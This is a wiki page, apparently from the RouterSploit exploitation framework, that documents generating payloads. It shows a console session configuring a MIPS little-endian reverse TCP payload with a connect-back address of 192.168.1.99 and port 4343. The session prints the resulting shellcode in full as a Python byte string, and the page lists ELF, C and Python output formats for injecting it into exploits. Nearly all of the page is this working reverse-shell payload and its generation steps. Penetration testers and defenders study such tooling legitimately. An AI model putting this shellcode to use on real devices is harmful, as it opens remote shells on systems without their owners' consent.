Generating Payloads
Marcin Bury edited this page Oct 13, 2018
·
7 revisions
rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
lhost Connect-back IP address
lport 5555 Connect-back TCP Port
Module options:
Name Current settings Description
---- ---------------- -----------
encoder Encoder
output python Output type: elf/c/python
filepath /tmp/Pf8CV10g Output file to write
rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.99
[+] lhost => 192.168.1.99
rsf (MIPSLE Reverse TCP) > set lport 4343
[+] lport => 4343
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xf7\x05\x3c\x02\x00"
"\xa5\x34\xf8\xff\xa5\xaf\x01\x63\x05\x3c\xc0\xa8\xa5\x34\xfc"
"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
"\x01"
)
Payloads can be generated into following formats output:
-
elf- elf binary that can be executed on the target system (CPU architecture has to match) -
c- payload that can be used as a part of C exploit and injected directly into memory -
python- payload that can be used as a part of python exploit and injected directly into memory
Communication